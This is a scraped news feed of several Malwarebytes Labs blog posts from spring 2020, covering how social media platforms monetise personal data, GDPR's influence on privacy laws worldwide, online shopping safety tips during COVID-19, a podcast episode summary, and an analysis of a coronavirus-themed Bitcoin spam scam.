  • Organizations globally are exposing their networks to risk by using insecure RDP and VPN to go remote due to COVID-19. (Source: Hot for Security)
  • Houseparty is offering a $1 million reward to anyone providing proof it was the victim of a paid commercial smear campaign. (Source: TechSpot)
  • The Marriott hotel chain announced that it had suffered another data breach exposing 5.2 million guest records. (Source: SiliconRepublic)
  • Online threats have risen by as much as six times their usual levels over the past four weeks as the COVID-19 pandemic provides new ballast for cyberattacks. (Source: InfoSecurity)
  • The Internet is rife with online communities where users can go and share Zoom conference codes to organize Zoom-bombing raids. (Source: ZDNet)
  • After being criticized about several problems, Zoom itself decided to dedicate all the resources needed to better identify, address, and fix issues proactively. (Source: Zoom Blog)

Stay safe everyone!

The post A week in security (March 30 – April 5) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How social media platforms mine personal data for profit

Malwarebytes - Fri, 04/03/2020 - 18:42

It’s almost impossible not to rely on social networks in some way, whether for personal reasons or business. Sites such as LinkedIn continue to blur the line, adding more social functionality over time with features and services resembling less formal sites, such as Facebook. Can anyone imagine not relying on, of all things, Twitter to instantly catch up on breaking coronavirus news around the world? The trade-off is your data, and how these platforms profit from it.

Like it or not—and it’s entirely possible it’s a big slab of “not”—these services are here to stay, and we may be “forced” to keep using them. Some of the privacy concerns that lead people to say, “Just stop using them” are well founded. The reality, however, is not quite so straightforward.

For example, in many remote regions, Facebook or Twitter might be the only free Internet access people have. And with pockets of restriction on free press, social media often represents the only outlet for “truth” for some users. There are some areas where people can receive unlimited Facebook access when they top up their mobiles. If they’re working, they’ll almost always use Facebook Messenger or another social media chat tool to stay in touch rather than drain their SMS allowance.

Many of us can afford to walk away from these services; but just as many of us simply can’t consider it when there’s nothing else to take its place.

Mining for data (money) has never been so profitable.

But how did this come to be? In the early days of Facebook, it was hard to envision the platform being used to spread disinformation, assist in genocide, or sell user data to third parties. We walk users through the social media business model and show how the inevitable happens: when a product is free, the commodity is you and your data.

Setting up social media shop

Often, venture capital backing is how a social network springs to life. VC firms invest large sums in promising-looking services and technology with the expectation that they’ll make big money and gain a return on investment in the form of ownership stakes. When the company is bought out or goes public, it’s massive sacks of cash for everybody. (Well, that’s the dream. The reality is usually quite a bit more complicated.)

It’s not exactly common for these high-risk gambles to pay off, and what often happens is the company never quite pops. They underperform, or key staff leave, and they expand a little too rapidly with the knock-on effect that the CEO suddenly has this massive service with millions of users and no sensible way to turn that user base into profit (and no way to retain order on a service rife with chaos).

At that point, they either muddle along, or they look to profit in other ways. That “other way” is almost always via user data. I mean, it’s all there, so why not? Here are just some of the methods social networks deploy to turn bums on seats into massive piles of cash.

Advertising on social media

This is the most obvious one, and a primary driver for online revenue for many a year. Social media platforms tend to benefit in a way other more traditional publishers cannot, and revenue streams appear to be quite healthy in terms of user-revenue generation.

Advertising is a straightforward way for social media networks to not only make money from the data they’ve collected, but also create chains where external parties potentially dip into the same pool, too.

At its most basic, platforms can offer ad space to advertisers. Unlike traditional publishing, social media ads can be tailored to personalized data the social network sees you searching for, talking about, or liking daily. If you thought hitting “like” (or its equivalent) on a portal was simply a helpful thumbs up in the general direction of someone providing content, think again. It’s quite likely feeding data into the big pot of “These are the ads we should show this person.” 

Not only is everything you punch into the social network (and your browser) up for grabs, but everything your colleagues and associates do too, tying you up in a neat little bow of social media profiling. All of it can then be mined to make associations and estimations, which will also feed back to ad units and, ultimately, profit.

Guesstimates are based on the interests of you, your family, your friends, and your friends’ friends, plus other demographic-specific clues, such as your job title, pictures of your home, travel experiences, cars, and marriage status. Likely all of these data points help the social network neatly estimate your income, another way to figure out which specific adverts to send your way.

After all, if they send you the wrong ads, they lose. If you’re not clicking through and popping a promo page, the advertisers aren’t really winning. All that ad investment is essentially going to waste unless you’re compelled to make use of it in some way.

Even selling your data to advertisers or other marketing firms could be on the table. Depending on terms of service, it’s entirely possible the social platforms you use can anonymise their treasure trove and sell it for top dollar to third parties. Even in cases where the data isn’t sold, simply having it out there is always a bit risky.

There have been many unrelated, non-social media instances where supposedly anonymous data turned out not to be. There are always people who can come along afterwards and piece it all together, and they don’t have to be Sherlock Holmes to do it. All this before you consider that social media sites and platforms with social components aren’t immune to the perils of theft, leakage, and data scraping.

As any cursory glance at a security news source will tell you, there are an awful lot of rogue advertisers out there offsetting the perfectly legitimate ones. Whether by purchase or by stumbling upon data leaked online, scammers are happy to take social media data and tie it up in email and phone scams and additional fake promos. At that point, even data generated through theoretically legitimate means is being (mis)used in some way by unscrupulous individuals, which only harms the ad industry further.

Apps and ads

Moving from desktop to mobile is a smart move for social networks, and if they’re able to have you install an app, then so much the better (for them). Depending on the mobile platform, they may be able to glean additional information about sites, apps, services, and preferred functionalities, which wouldn’t necessarily be available if you simply used a mobile web browser.

If you browse for any length of time on a mobile device, you’ll almost certainly be familiar with endless pop-ups and push notifications telling you how much cooler and awesome the app version of site X or Y will be. You may also have experienced the nagging sensation that websites seem to degrade in functionality over time on mobile browsers.

Suddenly, the UI is a little worse. The text is tiny. Somehow, you can no longer find previously overt menu options. Certain types of content no longer display correctly or easily, even when it’s something as basic as a jpeg. Did the “Do you want to view this in the app?” popup reverse the positions of the “Yes” and “No” buttons from the last time you saw it? Are they trying to trick you into clicking the wrong thing? It’s hard to remember, isn’t it?

A cynic would say this is all par for the course, but this is something you’ve almost certainly experienced when trying to do anything in social land on a mobile minus an app.

Once you’re locked into said app, a brave new world appears in terms of intimately-detailed data collection and a huge selection of adverts to choose from. Some of them may lead to sponsored affiliate links, opening the data harvesting net still further, or lead to additional third-party downloads. Some of these may be on official platform stores, while others may sit on unofficial third-party websites with all the implied risk such a thing carries.

Even the setup of how apps work on the website proper can drive revenue. Facebook caught some heat back in 2008 for its $375 USD developer fee. Simply having a mass of developers making apps for the platform—whether verified or not—generates data that the social network can make use of, then tie back to its users.

It’s all your data, wheeling around in a tumble drier of analytics.

Payment for access/features

Gating access to websites behind paywalls is not particularly popular with the general public. Therefore, most sites with a social networking component will usually charge only for additional services, and those services might not even be directly related to the social networking bit.

LinkedIn is a great example of this: the social networking part is there for anybody to use because it makes all those hilariously bad road warrior lifestyle posts incredibly sticky, and humorous replies are often the way people first land on a profile proper. However, what you’re paying for is increased core functionality unrelated to the “Is this even real?” comedy posts elsewhere.

In social networking land, some platforms took a gated, though not payment-based, approach. Orkut, for example, required a login to access any content. Part of the thinking was that a gated community could keep the bad things out. In reality, when data-stealing worms started to spread, it just meant the attacks were contained within the walls and hit the gated communities with full force.

The knock-on effect was that security researchers’ ability to analyse and tackle these threats was delayed, because many of these services were either niche or specific to certain regions only. As a result, finding out about these attacks was often at the mercy of simply being informed by random people that “X was happening over in Y.”

These days, access is much more granular, and it’s up to users to display what they want, with additional content requiring you to be logged in to view.

Counting the cost

Of the three approaches listed above, payment/gating is one of the least popular techniques for encouraging a revenue stream. Straight-up traditional advertising isn’t as fancy as app/site/service integration, but it’s something pretty much anybody can use, which is handy for devs without the mobile know-how or funds to make it happen.

Even so, nothing quite compares to the flexibility provided by mobile apps, integrated advertising, and the potential for additional third-party installs. With the added boost to sticky installs via the pulling power of social media influencers, it’s possibly never been harder to resist clicking install for key demographics.

The most important question, then, turns out to be one of the most common: What are you getting in return for loading an app onto your phone?

It’s always been true for apps generally, and it’ll continue to be a key factor in social media mobile data mining for the foreseeable future. “You are the product” might be a bit long in the tooth at this point, but where social media is concerned, it’s absolutely accurate. How could the billions of people worldwide creating the entirety of the content posted be anything else?

The post How social media platforms mine personal data for profit appeared first on Malwarebytes Labs.

Categories: Techie Feeds

GDPR: An impact around the world

Malwarebytes - Wed, 04/01/2020 - 19:19

A little more than one month after the European Union enacted the General Data Protection Regulation (GDPR) to extend new data privacy rights to its people, the governor of California signed a separate, sweeping data protection law that borrowed several ideas from GDPR, igniting a legislative data privacy trend that has now spanned at least 10 countries.

In Chile, lawmakers are updating decades-old legislation to guarantee that their Constitutional data protections include the rights to request, modify, and delete personal data. In Argentina, legislators are updating a set of data privacy protections that already granted the country a “whitelist” status, allowing it to more seamlessly transfer data to the European Union. In Brazil, the president signed a data protection law that comes into effect this August that creates a GDPR-like framework, setting up rules for data “controllers” and “owners,” and installing a data protection authority to regulate and review potential violations.

Beyond South America, India is mulling a new law that would restrict how international companies use personal data, but the law includes a massive loophole for government agencies. Canada passed its first, national data breach notification law, and in the United States, multiple state and federal bills have borrowed liberally from GDPR’s ideas to extend the rights of data access, deletion, and portability to the public.

GDPR came into effect two years ago, and its impact is clear: Data privacy is the law of the land, and many lands look to GDPR for inspiration.

Amy de La Lama, a partner at Baker McKenzie who focuses her legal practice on global privacy, data security, and cybersecurity, said the world is undergoing major shifts in data privacy, and that GDPR helped spur much of the current conversations.

“At a high level, there’s a huge amount of movement in the privacy world,” de La Lama said, “and, without a doubt, the GDPR has been a huge driver.”

The following laws and bills are a sample of the many global efforts to bring data privacy home. Often, the newer laws and legislation are influenced by GDPR, but several countries that passed data privacy laws before GDPR are still working to update their own rules to integrate with the EU.

This is GDPR around the world.

South America

Several countries in South America already grant stronger data protection rights to their public than in the United States, with several enshrining a right to data protection in their constitutions.

In 2018, Chile joined that latter club, supplementing its older, constitutional right to privacy with a new right to data protection. The constitution now says:

“The Constitution ensures to every person: … The respect and protection of private life and the honor of the person and his family, and furthermore, the protection of personal data. The treatment and protection of this data will be put into effect in the form and conditions determined by law.”

That last reference to “conditions determined by law” matters deeply to Chileans’ actual data protection rights because even though the Constitution protects data, it does not specify how that data should be protected.

Think of it like the US Constitution, which, for instance, protects US persons against unreasonable searches. Only within the past few decades, however, have courts and lawmakers interpreted whether “unreasonable searches” include, for instance, searches of emails sent through a third-party provider, or searches of historical GPS data tracked by a mobile phone.

Now, Chile is working to determine what its data protection rights will actually include, with a push to repeal and replace a decades-old data protection law called the “Personal Data Protection Act,” or Act No. 19.628. The latest legislative efforts include a push to include the rights to request, modify, and delete personal data, along with the right to withdraw consent from how a company collects, stores, writes, organizes, extracts, transfers, and transmits personal data.

Revamping older data protections is not unique to Chile.

Argentina implemented its Personal Data Protection Law (PDPL) in 2000. That law, unlike Chile’s, drew its inspiration from the European Union long before the passage of GDPR: Argentina’s lawmakers aligned their legislation with the law that GDPR repealed and replaced, the Data Protection Directive of 1995.

This close relationship between Argentinian and European data protection law made Argentina a near shoo-in for GDPR’s so-called “whitelist,” a list of countries outside the European Union that have been approved for easier cross-border data transfers because of those countries’ “adequate level of data protection.” This status can prove vital for the countless companies that move data all around the world.

According to the European Commission, countries that currently enjoy this status include Andorra, Argentina, Canada (for commercial organizations), the Faroe Islands, Guernsey, Israel, the Isle of Man, Japan, Jersey, New Zealand, Switzerland, and Uruguay. The US is also included, so long as data transfers happen under the limited Privacy Shield framework, an agreement that replaced an earlier data transfer agreement called “Safe Harbor,” which the Court of Justice of the European Union found invalid.

(Privacy Shield also faces challenges of its own, so maybe the US should not get too comfortable with its status.)

Despite Argentina’s current whitelist status with the European Commission, the country is still trying to update its data protection framework with a new piece of legislation.

The new bill, Bill No. MEN-2018-147-APN-PTE, was introduced to Argentina’s Congress in September 2018. Its proposed changes include allowing the processing of sensitive data with approved consent from a person, expanding the territorial reach of personal data protections, creating new rules for when to report data breaches to the country’s data regulator, and drastically increasing the sanctions for violating the law.

Within South America, there is still at least one more country influenced by GDPR.

In August 2018, Brazil’s then-president Michel Temer signed the country’s General Data Protection Law (“Lei Geral de Proteção de Dados Pessoais,” or LGPD). The law comes into effect in August 2020.

The similarities to GDPR are many, de La Lama said.

“Like the GDPR, the new law, when it comes into effect, applies extraterritorially, contains notice and consent and cross-border transfer requirements as well as obligations with regard to data subject rights and data protection officer appointment,” de La Lama said. “EU Standard Contractual clauses may be recognized under the new law but this step has not yet been taken.”

The LGPD defines “sensitive data” as personal data that reveals racial or ethnic origin, political opinions, religious or philosophical beliefs, and trade union membership, along with genetic data, biometric data used to uniquely identify a natural person, health and medical information, and data concerning a person’s sex life or sexual orientation.

Similar to GDPR, Brazil’s LGPD also creates a distinction between data controllers or owners, and data processors, a framework that has quickly rolled out in proposed laws around the world, including the United States. Brazil’s LGPD also applies beyond the country’s borders. The law applies to companies and organizations that offer goods or services to those living within Brazil, much like how GDPR applies to companies that direct marketing towards those living inside the European Union.

The law also, following amendments, includes the creation of the Brazilian Data Protection Authority. That body will have sole authority to issue regulations and to sanction organizations that violate the law through, for example, a data breach.

India

In late 2019, India’s lawmakers introduced a data protection law two years in the making, which included minor similarities to the EU’s GDPR. The Personal Data Protection Bill of 2019, or PDPB, would require international companies to seek the consent of India’s public for many uses of personal data, and grant the people a new right to have their data erased.

The similarities stop there.

While portions of the law gesture at the main purpose of GDPR, the data protections it actually includes suffer from an enormous loophole. As written, the law’s data restrictions do apply to government agencies, but the law also allows the government to exempt any agency it chooses.

The law would permit New Delhi to “exempt any agency of government from application of Act in the interest of sovereignty and integrity of India, the security of the state, friendly relations with foreign states, public order,” according to an early, leaked draft of the law obtained by TechCrunch.

This exceptionally broad language is akin to the “national security” loopholes found in United States law, and it is one that digital rights activists in India are fighting.

“This is particularly concerning in India given that the government is the largest collector of data,” said Apar Gupta, executive director of the Internet Freedom Foundation, in talking to the New York Times.

Salman Waris, who leads the technology practice at the New Delhi law firm TechLegis, also told the New York Times that the new Indian law purports to protect the public while actually accomplishing something else.

“It gives a semblance of owning your data, and having the right to know how it is used, to the individual,” Waris said, “but at the same time it provides carte blanche to the government.”

GDPR in the United States

Though we’ve focused on GDPR’s impact on a global scale, it is impossible to deny the influence felt at home in the United States.

While Congress’s efforts to pass a comprehensive data privacy law date back to the Cambridge Analytica scandal of 2018, some of the ideas embedded in more current data privacy legislation relate directly to GDPR.

One clear example is the California Consumer Privacy Act (CCPA), said Sarah Bruno, partner at Reed Smith who works at the intersection of intellectual property, privacy, and advertising. Though the law was signed less than one month after GDPR took effect in the EU, its drafters had ample time to borrow from GDPR, which had received final approval back in 2016.

“GDPR did have an impact on CCPA,” Bruno said, “and it has a lot of components in CCPA.”

CCPA grants Californians the rights to access and delete data, the right to take their data and port it to a separate provider, along with the right to know what data about them is being collected. Californians also enjoy the explicit right to opt out of having their data sold, which does not appear verbatim in GDPR, though that law does give residents protections that could produce a similar outcome. And though CCPA does not grant rights to “data subjects,” as GDPR does, it has a similar scope of effect. Much of the law is about giving consumers access to their own information.

“Consumers are able to write to a company, similar to GDPR, to find out what information [the company] is collecting on them, via cookies, about their purchase history, what they’re looking at on websites when on there,” Bruno said. She added that CCPA contends that “all that information, a California consumer should have access to that, and that’s new in the US, but similar to GDPR.”

But California is just one state inspired by GDPR. There’s also Washington, which, earlier this year, introduced a remodeled version of its Data Privacy Act.

“It’s similar as well to CCPA,” Bruno said about Washington’s revamped bill. “As I call it, CCPA plus.”

The Data Privacy Act hews close to GDPR, in that it borrows some of the EU law’s language on data “controllers” and “processors,” which would both receive new restrictions on how personal data is collected and shared. The law, much like GDPR, would also provide Washingtonians with the rights to access, control, delete, and port their data. Much like CCPA, the Data Privacy Act would also let residents specifically opt out of data sales.

Though the bill initially drew a warm welcome from Microsoft and the Future of Privacy Forum, shortly after, the Electronic Frontier Foundation opposed the legislation, calling it a “weak, token effort at reining in corporations’ rampant misuse of personal data.”

The bill, introduced on January 13 this year, has not moved forward.

GDPR’s legacy: Fines or fatigue?

GDPR’s passage came with a clear warning sign to potential violators—break the law and face fines of up to 4 percent of global annual revenue for the most serious violations, or 2 percent for lesser ones. For an Internet conglomerate like Alphabet, which owns Google, such an enforcement action would mean paying more than a billion dollars. The same is true for Apple, Facebook, Amazon, Verizon, and AT&T, just to name a few.

Despite having the tools to hand down billion-dollar penalties, authorities across Europe were initially shy about using them. In early January 2019, France’s National Data Protection Commission (CNIL) levied a €50 million penalty against Google after investigators found a “lack of transparency, inadequate information and lack of valid consent regarding the ads personalization.” It was the largest penalty at the time, but it paled in comparison to what GDPR allowed: even at the lower 2 percent tier, Alphabet’s 2018 revenue implies a possible fine of about €2.47 billion, or $2.72 billion in today’s dollars.
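The arithmetic behind that ceiling is easy to check. A quick sketch, assuming Alphabet’s reported 2018 revenue of roughly $136.8 billion, the 2 percent tier, and a rough exchange rate of about $1.10 per euro (the revenue and exchange-rate figures are our own approximations, not taken from the regulators):

```python
# Back-of-the-envelope GDPR fine cap for Alphabet, fiscal year 2018.
# Assumptions: revenue of ~$136.8B and a EUR/USD rate of ~1.10,
# both approximate 2018 figures.

ALPHABET_2018_REVENUE_USD = 136.8e9  # Alphabet's reported FY2018 revenue
EUR_PER_USD = 1 / 1.10               # rough 2018 exchange rate

def gdpr_fine_cap(revenue_usd: float, tier: float = 0.02) -> float:
    """Maximum fine in USD at the given percentage tier of global revenue."""
    return revenue_usd * tier

cap_usd = gdpr_fine_cap(ALPHABET_2018_REVENUE_USD)
cap_eur = cap_usd * EUR_PER_USD
print(f"Cap: ${cap_usd / 1e9:.2f}B (~€{cap_eur / 1e9:.2f}B)")
```

Any small gap from the figures cited above comes down to the exact revenue and exchange-rate numbers used.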

Six months later, regulators leaned more heavily into their powers. In July 2019, the United Kingdom’s Information Commissioner’s Office (the UK was at the time still a member of the European Union) announced its intention to fine British Airways $230 million over an earlier data breach that affected 500,000 customers. The penalty represented 1.5 percent of the airline’s 2018 revenue.

But regulatory fines tell just one side of GDPR’s story, because, as de La Lama said, after the law’s passage, her clients tell her of fatigue in trying to comply with every new law.

The nuances between each country’s data protection laws have produced guide after guide from global law firms, each attacking the topic with its own enormous tome of information. De La Lama’s own law firm, Baker McKenzie, released its annual global data protection guide last year, clocking in at 886 pages. A quick glance reveals the subtle but important differences between the world’s laws: countries that adopt a framework separating data restrictions between “controllers” and “processors,” countries that protect “consumers” versus “data subjects,” countries that require data breaches to be reported to data protection authorities, countries that create data protection authorities, and countries that differ on just what the hell personal information includes.

Complying with one data protection law can be hard enough, de La Lama said, and there is little assurance that the current data privacy movement is coming to a close.

“There’s difficulty in trying to bring a company into compliance with a wide variety of privacy and technical specifications and finding internal resources to do that is a daunting task,” de La Lama said. “And when you’re trying to replicate that across multiple jurisdictions, we’re seeing a lot of companies just trying to wrap their arms around how to do that, knowing that GDPR isn’t the end game, but really just the start.”

The post GDPR: An impact around the world appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Important tips for safe online shopping post COVID-19

Malwarebytes - Tue, 03/31/2020 - 18:57

As more and more countries order their citizens inside in response to COVID-19, online shopping—already a widespread practice—has surged in popularity, especially for practical items like hand sanitizer, groceries, and cleaning products. When people don’t feel safe outside, it’s only natural they’d prefer to shop as much as possible from the safety of their own homes. Unfortunately, you can bet your last toilet paper roll that cybercriminals anticipated the rush and were ready to take advantage of our need to buy supplies of all kinds online.

Because we know how cybercriminals think and have already seen an uptick in web skimmers and coronavirus scams, we wanted to prepare our readers for a safer online shopping experience. We have rounded up some tips for staying secure, as well as some landmines to avoid during your online shopping spree.

Dangers to avoid while shopping online

There are a few dangers that always lurk for online shoppers, and some of them increase in severity during particular events, such as holidays or summer travel season, known shopping periods like Cyber Monday or Singles’ Day, or tragic incidents, including natural disasters and the current global pandemic. Here are a few red flags to watch out for:

Raised prices

It’s only natural to expect a small rise in prices as some companies cope with the economic fallout of closing brick-and-mortar shops and a lack of personnel. Combine that with increased demand for specific items, plus higher delivery costs to compensate for added danger, and totals at checkout are probably creeping up all over the place. But it’s one thing to raise prices responsibly. It’s quite another to price gouge, and cybercriminals and scammers are opting for the latter to profit from misfortune.

During times like these, it’s easy to click “purchase” on the first webpage peddling scarce or highly sought-after commodities. For example, two brothers tried to make a fortune selling hand sanitizer for $70 per bottle. People were desperate enough to buy before the attorney general shut down the site. But don’t fall for the hype. Take a deep breath and research an item before jumping at the first opportunity to purchase.

Pro tip: If a price seems wildly out of line, open up a new tab on your browser and search the item name and pricing. You can also check sites such as Tom’s Guide or Consumer Reports for fair prices.

Delays in delivery time

If items are scarce, there may be a long waiting time before delivery. Know your rights in case a supplier can’t deliver within the agreed time frame, and don’t fall for scammers promising they can help you cut the line. Usually, you can claim a refund if the article doesn’t arrive by the date you were promised. But a scammer couldn’t care less about your claims for a refund. They will make sure they are nowhere to be found when the claims come in and the going gets rough.

Pro tip: Search a website’s customer service pages to find out delivery and return policies before purchasing, especially for items in short supply. Typically, these policies are found on shipping, support, help, or FAQ webpages.

Counterfeit goods

Selling counterfeit goods is another common type of web crime that will likely see an uptick during the coronavirus pandemic. From a photograph, it is nearly impossible to tell whether an item is faux or the real deal. For all we know, the scammer could put a picture of the original on their site and ship you a cheap replica, or nothing at all. A good rule of thumb: If it seems too good to be true, it probably is.

Pro tip: Check the reviews of the seller, reseller, and product—not just on the site, but in a separate search. If someone has been duped before, chances are, they’ll post pictures or a review.

Web skimmers

Ever since shelter-in-place orders sent millions of shoppers online, the Malwarebytes threat intelligence team has noticed an uptick in the number of digital credit card skimmers, also known as web skimmers. Web skimmers are placed on shopping cart pages and collect the payment data that customers enter when they purchase an item online.

Cybercriminals can hack the websites of legitimate brands to insert web skimmers, so avoiding resellers or little-known boutiques won’t protect shoppers from web skimmers. Instead, consider using an antivirus with web protection or browser extensions that block malicious content.

Jérôme Segura, Malwarebytes’ Director of Threat Intelligence, is an internationally renowned expert on web skimmers. He was kind enough to share some of his knowledge with us:

“The vast majority of people, including those familiar with computers, would not be able to see that an online merchant has been hacked and that a skimmer is going to harvest their information.

But there are certain things you can do to minimize risks. For example, check that the site looks up to date by looking at things such as copyright information. If it says something like Copyright 2015, this may be an indication that the site owner is not paying attention to details.

I also believe it’s essential to use some kind of web protection. Based on our telemetry, we stop hundreds of attempts to steal credit card data on a daily basis by blocking malicious domains and IP addresses associated with web skimming infrastructure.”
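In spirit, the domain- and IP-level blocking Segura describes is a lookup against curated threat intelligence: before the browser fetches a resource, the protection layer checks its hostname against a list of known-bad infrastructure. A toy sketch (the blocklist entries below are made-up placeholders, not real skimmer domains):

```python
from urllib.parse import urlparse

# Toy illustration of domain-based blocking; the entries below are
# made-up placeholders, not real skimmer infrastructure.
BLOCKED_DOMAINS = {"evil-skimmer.example", "fake-checkout.example"}

def is_blocked(url: str) -> bool:
    """Return True if the URL's hostname, or any parent domain, is blocklisted."""
    host = urlparse(url).hostname or ""
    parts = host.split(".")
    # Check the full host and every parent domain against the blocklist,
    # so subdomains of a blocked domain are caught too.
    return any(".".join(parts[i:]) in BLOCKED_DOMAINS for i in range(len(parts)))

print(is_blocked("https://evil-skimmer.example/checkout.js"))  # True
print(is_blocked("https://cdn.evil-skimmer.example/x.js"))     # True
print(is_blocked("https://shop.example.com/"))                 # False
```

Real web protection does this in the browser or network stack against constantly updated threat feeds; the sketch only shows the shape of the check.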

Pro tip: Keep an eye on your bank account for unexpected payments, and know what to do when your information has been stolen.

Recommended reading: How to protect your data from Magecart and other e-commerce attacks

Precautions and possible pitfalls

While not outright dangers, there are a few somewhat shady behaviors that could signal further trouble down the road. Here are a few you might want to avoid or take into account when you consider online shopping.

Security certificates

A significant surge in the number of requested security certificates indicates that more fraudulent websites are being created. As we have mentioned before on the blog, the green padlock alone does not guarantee a safe site. Free or cheap security certificates are an indication that the site might be fraudulent or built without any attention to real security.

Use trusted sites and visit them directly, not through a search. Using legitimate sites with a good reputation does have obvious advantages. You know it’s a real shop and they deliver on what they promise.

Pro tip: Bookmark favorite URLs to save on manually typing. By saving the URL rather than searching for a shop name, you are less likely to be fooled by impersonators.

Targeted ads

Targeted advertising should not be rewarded, and it’s usually better to ignore it, for much the same reasons as above. Visit the site directly instead of clicking a link in your Facebook feed. Many shops use cookies for targeted advertising, so they will quickly pick up that you are looking for a certain item and try to lure you to their site by offering it in your timeline.

Pro tip: Consider purchasing insurance for high-value products. With insurance, you can at least get your money back if your purchase never arrives or is damaged or otherwise below expectations. Insurance does not have to be expensive. PayPal and many credit cards offer this service free of charge.

Information overload

Be wary of web shops asking you for information they don’t need to serve you. They might be up to no good. And even if they are not, they have no business asking for details that are unnecessary for the shopping and delivery process. Even if they never plan to sell your data to third parties, they may suffer a breach and spill your personal information anyway.

Pro tip: Only fill in required sections of any data forms for an online purchase. And if a form starts asking for social security numbers, pet’s names, or other weirdly personal information, do not enter the content and back out of the purchase.

Recommended reading: 10 tips for safe online shopping on Cyber Monday

Preventative measures

As always, it’s important to take the normal security precautions while shopping online. These include the following:

  • Use up-to-date software, especially your operating system and your browser. Check that both are updated before you venture online.
  • Disregard overly aggressive pop-ups, push notifications, and other annoying cries for attention. Usually, unsolicited advice in the form of persistent advertisements, browser extension downloads, coupon programs, and other assorted spam are aiming for trickery and not actually trying to help.
  • Pay extra attention when using public Wi-Fi, and avoid making payments while you are on unprotected Wi-Fi.
  • Where possible, use a VPN during online shopping. A good VPN will encrypt the traffic between you and the online shop, so nobody can spy on it.

Stay safe, everyone!

The post Important tips for safe online shopping post COVID-19 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Lock and Code S1Ep3: Dishing on data privacy with Adam Kujawa

Malwarebytes - Mon, 03/30/2020 - 16:33

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Adam Kujawa, a director of Malwarebytes Labs, about the state of data privacy today, including how users and businesses can protect sensitive information when there are few laws to help them out, and whether we could foresee the many problems with today’s rampant data sharing when we first built the Internet.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research, plus other cybersecurity news:
  • Housing association spills data: A “please update your details” missive has horrible data exposure consequences for a UK-based organization. (Source: The Register)
  • The age-old problem of password reuse: Shockingly, it’s a problem for Fortune 500 companies, too. (Source: Help Net Security)
  • Homework equals router mayhem: With many worldwide retreating to their home environment, it figures that hackers would follow them there. (Source: Cyberscoop)
  • Compromised news sites lead to malware: A variety of backdoor files are offered up by hijacked news portals. (Source: Bleeping Computer)
  • Netflix and phish: The increase in work-from-home employees is also giving rise to a bump in attacks on streaming services. (Source: RapidTV News)

Stay safe, everyone!

The post Lock and Code S1Ep3: Dishing on data privacy with Adam Kujawa appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Coronavirus Bitcoin scam promises “millions” working from home

Malwarebytes - Thu, 03/26/2020 - 17:05

In the last week, we’ve seen multiple coronavirus scams pushed by bad actors, including RAT attacks via fake health advisories, bogus e-books working in tandem with Trojans, and lots of other phishing shenanigans. Now we have another one to add to the ever-growing list: dubious coronavirus Bitcoin missives landing in your inbox.

Reworking a classic spam tactic

This is a retooling of an older spam run involving British comedian Jim Davidson, the older form of which was seen bouncing around in November 2019. As they put it, “Jim Davidson bounced back from bankruptcy with Bitcoin.” Even before that, in the first half of 2019, he was being used alongside other well-known British celebrities such as Jamie Oliver and daytime TV presenters to promote a variety of misleading Bitcoin get-rich schemes. This is common for Bitcoin scams, and you can dip into any year you like and find a few of these floating around at any given time.

What do we have this time?

In short, these coronavirus Bitcoin scams are older attempts to part people from their cash, hastily retooled to make hay with the current global pandemic. It’s incredibly lazy: the landing pages and follow-on websites seem untouched from whenever they first appeared. The only new ingredient is the email content mentioning coronavirus, but sadly, that’s often more than enough to make people part with their money.

Click to enlarge

It begins with a non-stop drip-feed of emails, from many different addresses pumping out spam. In the above mailbox, it’s a total of 11 in six days. All of the email addresses are rather optimistically called “coronavirus positives”, letting you know that staying at home thanks to a global pandemic can actually make you rich beyond your wildest dreams.

Some of the subject lines read as follows:

Staying at home because of COVID-19!! Spend your time making thousands on Bitcoins. 

The positive impact of staying home (Corona-virus), Make thousand a day trading Bitcoin.

Join 1000s of Brits making 1000s a day. Bitcoin is back – and this time you can make a million.

Without a larger sample selection to go from, we can’t say which subject line is the most popular overall, but the one about staying at home is at least the most common in this particular mailbox and a few others that we’ve seen.

Coronavirus Bitcoin email style

The emails are formatted in much the same way, emulating the British newspaper “red top” style—most specifically, The Sun.

Here’s the text from one of the samples we looked at:

Click to enlarge

Click to enlarge

The text reads as follows:

Jim Davidson Reveals How He Bounced Back After The Bankruptcy – He claims anyone can do it & shows ‘Good Morning Britain’ How!

Appearing on ‘Good Morning Britain’ show, Jim Davidson, a man who has recovered from Bankruptcy thanks to an automated Bitcoin trading platform, called BTC Profit . The idea was simple: allow the average person the opportunity to cash in on the Bitcoin boom. Even if they have absolutely no investing or technology experience.

A user would simply make an initial deposit into the platform, usually of £200 (or $250, as the platform works with USD) or more, and the automated trading algorithm would go to work. Using a combination of data and machine learning, the algorithm would know the perfect time to buy Bitcoin low and sell high, maximising the user’s profit.

To demonstrate the power of the platform Jim had Kate Garraway deposited £200 on the live show.

Here’s one that emulates The Sun to a high degree, complete with almost-but-not-quite name using the same font as the well-known newspaper:

Click to enlarge

In the above mail, a student reveals how “he earns more than £40,000 every month working from home.” Some of the links are now seemingly broken, and a few redirect to Google or to random shopping sites such as the one below, presumably if you visit from a region the scammers aren’t interested in:

Click to enlarge

Not all of the links are broken, however. A few will indeed lead you to the supposed Bitcoin promised land.

Getting rich quick?

What you’ll see on a live page is essentially a rehash of the information in the email, complete with a few more familiar faces from UK daytime television. At this point, the coronavirus hook has been entirely abandoned:

Click to enlarge

Click to enlarge

After much urging of the visitor to sign up for some sort of wonderful Bitcoin system, clicking the links will finally take them to the end game:

Click to enlarge

It’s a landing page promoting something called “Bitcoin Revolution.” This has been around for a while, usually in relation to dubious ads featuring the previously mentioned celebrities.

Access is given to a trading platform, a fair amount of money is deposited into it over time, an “investment manager” asks you to deposit their commission into a bank account so they can release your funds, and…oh dear. This is the part where people report the funds never arrive and now they’re massively out of pocket.

Profiting from chaos

Endlessly spamming these “get rich quick” emails in normal circumstances is bad enough, but jumping on the coronavirus bandwagon to claim people can make a fortune working from home is dreadful. This is the worst possible time to lose a significant chunk of savings; those funds may prove essential further down the line.

If you receive one of these mails and they’re not automatically placed into your spam folder, report, delete, and move on. We have a feeling you won’t be making your millions from this one.

The post Coronavirus Bitcoin scam promises “millions” working from home appeared first on Malwarebytes Labs.

Categories: Techie Feeds

